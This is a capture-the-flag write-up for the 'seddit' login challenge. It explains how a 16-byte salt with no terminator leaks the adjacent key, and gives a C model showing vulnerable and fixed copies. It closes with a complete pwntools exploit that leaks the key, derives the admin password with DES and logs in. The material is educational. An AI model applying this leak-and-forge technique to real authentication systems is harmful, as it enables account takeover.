
seddit

First, check which protections the binary was built with.

Then analyze it in IDA.

It is a mock login program: a user's password is the result of encrypting the username with salt+key.

As long as we can log in as the admin account, the program prints the answer.

The overflow point is here:

We can **make the salt exactly 16 bytes long, so that the key's contents end up written at v5's address; when we print it afterwards we get the key**. Then we encrypt the string admin with it to obtain the password and log in.

Putting it together, the exploit script:
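To make the leak concrete, here is a small model in C of the pattern the writeup describes: a 16-byte salt field sitting directly in front of the per-user key, filled by a copy that leaves no room for a terminator, so that a later `%s`-style print of the salt runs straight on into the key. This is an added example, not the seddit binary's code; the `struct account` layout, the 7-byte key, and the names `register_vuln`, `register_fixed` and `show_salt` are all assumptions made for illustration, with a bounded copy shown beside the vulnerable one.

```c
#include <stdio.h>
#include <string.h>

/* Assumed layout (not the real binary's): the salt buffer is immediately
 * followed by the key, so whatever ends the salt string also ends the leak. */
struct account {
    char salt[16];
    char key[8];      /* 7 key bytes plus a NUL in this model */
};

/* Vulnerable registration: strncpy with the full buffer size writes no NUL
 * when the salt is 16 bytes or longer, so salt and key become one string. */
static void register_vuln(struct account *a, const char *salt, const char *key)
{
    memset(a, 0, sizeof *a);
    strncpy(a->salt, salt, sizeof a->salt);        /* 16 bytes, no terminator */
    strncpy(a->key, key, sizeof a->key - 1);
    a->key[sizeof a->key - 1] = '\0';
}

/* Hardened registration: reserve one byte and always terminate the salt. */
static void register_fixed(struct account *a, const char *salt, const char *key)
{
    memset(a, 0, sizeof *a);
    strncpy(a->salt, salt, sizeof a->salt - 1);
    a->salt[sizeof a->salt - 1] = '\0';
    strncpy(a->key, key, sizeof a->key - 1);
    a->key[sizeof a->key - 1] = '\0';
}

/* What a "%s" of the salt field would print: bytes up to the first NUL.
 * The scan is bounded to the struct here only so the model itself stays
 * well-defined; the real printf has no such bound. Returns bytes printed,
 * so anything past 16 is leaked key material. */
static size_t show_salt(const struct account *a, char *out, size_t outlen)
{
    const char *p = (const char *)a;
    size_t n = 0;
    while (n < sizeof *a && p[n] != '\0')
        n++;
    if (n >= outlen)
        n = outlen - 1;
    memcpy(out, p, n);
    out[n] = '\0';
    return n;
}

int main(void)
{
    struct account a;
    char buf[64];
    const char *salt16 = "aaaaaaaaaaaaaaaa";   /* constructed 16-byte salt */
    const char *key = "S3cr3tK";               /* constructed 7-byte key   */

    register_vuln(&a, salt16, key);
    show_salt(&a, buf, sizeof buf);
    printf("vulnerable: %s\n", buf);           /* 16 a's followed by the key */
    printf("leaked key: %s\n", buf + 16);

    register_fixed(&a, salt16, key);
    show_salt(&a, buf, sizeof buf);
    printf("fixed:      %s\n", buf);           /* 15 a's, key never printed */
    return 0;
}
```

With a salt shorter than 16 bytes the zeroed struct still supplies a terminator and nothing leaks; it is precisely the full-length salt that removes it, which is why the exploit uses `'a'*0x10`.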

```python
#coding:utf8
# Python 2 / pwntools exploit, as written for the original challenge
from pwn import *
from ctypes import *
import binascii

sh = process('./seddit')
#sh = remote('111.198.29.45',49317)

# OpenSSL's DES routines, so the password is derived exactly as the binary does it.
# The path is system-dependent; any libcrypto exporting DES_string_to_key works.
cryptolib = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libcrypto.so.1.0.0')

def register(salt):
    sh.sendlineafter('What would you like to do?', '1')
    sh.sendlineafter('Enter username:', 'seaase')
    sh.sendlineafter('Enter salt:', salt)

def login(password):
    sh.sendlineafter('What would you like to do?', '2')
    sh.sendlineafter('Enter username:', 'admin')
    sh.sendlineafter('Enter password:', password)

def show():
    sh.sendlineafter('What would you like to do?', '3')
    sh.sendlineafter('Title:', 'Leak')
    sh.sendlineafter('What type of post?', '0')

# A 16-byte salt fills the salt buffer completely, leaving no terminator
# before the key
payload = 'a'*0x10
register(payload)
# Leak the key through the post content
show()
sh.recvuntil('content: ')
key = sh.recvuntil('\n', drop=True)[0:7]
print 'key=', key
passwd = 'a'*7 + key
user = 'admin'
# Encrypt: string -> DES key -> key schedule -> one ECB block of the username
key = (c_char * 8)('\x00')
des_key_schedule = (c_char * 128)('\x00')
ans_out = (c_char * 256)('\x00')
cryptolib.DES_string_to_key(passwd, key)
cryptolib.DES_set_key(key, des_key_schedule)
cryptolib.DES_ecb_encrypt(user, ans_out, des_key_schedule, 1)
# Take the ciphertext up to the first NUL and hex-encode it, matching the
# password format the binary expects
password = ''
for i in range(len(ans_out)):
    c = ans_out[i]
    if c == '\x00':
        break
    password += c
password = binascii.b2a_hex(password)
print 'password=', password

# Log in as admin and get the flag
login(password)
sh.interactive()
```